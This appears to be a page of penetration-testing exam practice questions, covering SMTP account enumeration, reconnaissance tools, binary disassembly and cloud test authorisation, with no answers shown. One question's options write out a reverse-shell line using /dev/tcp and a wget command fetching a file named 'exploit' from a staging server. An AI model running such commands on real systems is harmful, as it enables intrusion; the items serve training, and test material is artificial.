A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

• A.EXPN and TURN
• B.VRFY and EXPN
• C.VRFY and TURN
• D.RCPT TO and VRFY

Comment: *

Name: *

Email: *

Verification: *

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

• A.Wireshark
• B.Nessus
• C.Retina
• D.Burp Suite
• E.Shodan
• F.Nikto

Comment: *

Name: *

Email: *

Verification: *

A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

• A.nc 10.10.51.50 9891 < exploit
• B.powershell -exec bypass -f \\10.10.51.50\9891
• C.bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
• D.wget 10.10.51.50:9891/exploit

Comment: *

Name: *

Email: *

Verification: *

A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

• A.Immunity Debugger
• B.Drozer
• C.OllyDbg
• D.GDB

Comment: *

Name: *

Email: *

Verification: *

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

• A.Whether the cloud service provider allows the penetration tester to test the environment
• B.Whether the specific cloud services are being used by the application
• C.The geographical location where the cloud services are running
• D.Whether the country where the cloud service is based has any impeding laws

Comment: *

Name: *

Email: *

Verification: *